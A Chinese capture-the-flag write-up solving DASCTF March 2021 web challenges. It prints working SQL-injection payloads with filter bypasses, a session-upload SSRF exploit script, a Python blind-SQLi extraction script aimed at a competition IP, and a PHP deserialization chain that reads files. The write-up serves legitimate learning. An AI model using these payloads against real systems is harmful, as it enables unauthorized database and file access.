2021 MAR DASCTF web

本队大师傅AK了web 。。 趁着复现开的环境复现一波 学习了学习了

1.BestDB

看题目就知道是sql注入了

fuzz 一下发现过滤了单引号和空格 尝试用双引号和 # 闭合成功

查询列数 发现有三列 1"/**/order/**/by/**/3#

常规注入 查表名:

-1"union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()),3#

#f1agdas

列名

-1"union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name="f1agdas"/**/and/**/table_schema=database()#

#f1agdas

数据

-1"union/**/select/**/1,(select/**/f1agdas/**/from/**/f1agdas),3#

#flag.txt  数据库里面没有  于是想到用load_file读文件

查数据

-1"union/**/select/**/1,(select/**/load_file(0x2f666c61672e747874)),3#

#这里flag被过滤了 我们采用16进制绕过读取   hex(/flag.txt) ==0x2f666c61672e747874

2.baby_flask

我写好的 不是很详细 可以看看

https://wh1tecell.top/2021/04/01/ssti%E4%B9%8B%E5%AE%89%E6%81%92%E6%9C%88%E8%B5%9Bbaby-flask%E5%AD%A6%E4%B9%A0/

3.ez_login

源码:

<?php
    if(!isset($_SESSION)){
        highlight_file(__FILE__);
        die("no session");
    }
    include("./php/check_ip.php");
    error_reporting(0);
    $url = $_GET['url'];
    if(check_inner_ip($url)){
        if($url){
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
            $output = curl_exec($ch);
            $result_info = curl_getinfo($ch);
            curl_close($ch);
            }
    }else{
        echo "Your IP is internal yoyoyo";
    }
    
?>
no session

我们这里要想往下走 必须要先绕过 session 我们利用 PHP_SESSION_UPLOAD_PROGRESS上传session

exp:

import requests

url = 'http://183.129.189.60:10015/?url=http://localhost/admin.php'
mydata = {'PHP_SESSION_UPLOAD_PROGRESS':'L1yee'} 
myfile = {'file':('L1yee.txt','L1yee')}
mycookie = {'PHPSESSID':'x'}

r = requests.post(url=url, data=mydata, files=myfile, cookies=mycookie)
print(r.request.body.decode('utf8'))

print(r.text)

发现:

打开发现 se1f_Log3n.php

<?php
include("./php/db.php");
include("./php/check_ip.php");
error_reporting(E_ALL);
$ip = $_SERVER["REMOTE_ADDR"];
if($ip !== "127.0.0.1"){
    exit();
}else{
    try{
    $sql = 'SELECT `username`,`password` FROM `user` WHERE `username`= "'.$username.'" and `password`="'.$password.'";';
    $result = $con->query($sql);
    echo $sql;
    }catch(Exception $e){
        echo $e->getMessage();
    }
    ($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND die("error")) OR ( ($con->close() AND die('Try again!') )); 
}

盲注脚本

from urllib.parse import quote
import requests
import time

asc_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-{}"
mydata = {'PHP_SESSION_UPLOAD_PROGRESS':'we'} 
myfile = {'file':('a.txt','a')}
mycookie = {'PHPSESSID':'x'}
ip = 'http://183.129.189.60:10015/?url='

flag = ''
for l in range(1,50):
    for s in asc_str:
        payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select flag from ctf.secret),{},1))={}%23password=x'.format(l,ord(s))
        url = ip + quote(payload)
        r = requests.post(url=url, data=mydata, files=myfile, cookies=mycookie)
        time.sleep(0.5)
        if 'correct?' in r.text:
            flag += s
            print(flag)
        else:
            pass

payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select user()),{},1))={}%23password=x'.format(l,ord(s))

user(): root@localhost


payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select group_concat(schema_name) from information_schema.schemata),{},1))={}%23password=x'.format(l,ord(s))

databases: ctf,information_schema,mysql,performance_schema,test


payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}%23password=x'.format(l,ord(s))

Table_in_ctf: secret,users


payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=\'secret\'),{},1))={}%23password=x'.format(l,ord(s))

Column_in_secret: flag


payload = 'http://localhost//se1f_Log3n.php?username=mochu\'or ascii(mid((select flag from ctf.secret),{},1))={}%23password=x'.format(l,ord(s))

4.ez_serialize

源码:

 <?php
error_reporting(0);
highlight_file(__FILE__);

class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('bad hacker~');
    }

}
class B{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("hello ".$this->a);
    }
}
class C{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}


if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
else{
    $a=new A;

} 

熟悉的感觉 看到echo new我就想到 php原生文件操作类

参:https://www.anquanke.com/post/id/167140

<?php

class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "FilesystemIterator";
        $this->para = "./aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";
    }
    // public function __construct()
    // {
    //     $this->class = "SplFileObject";
    //     $this->para = "./aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";
    // }


}
echo serialize(new A);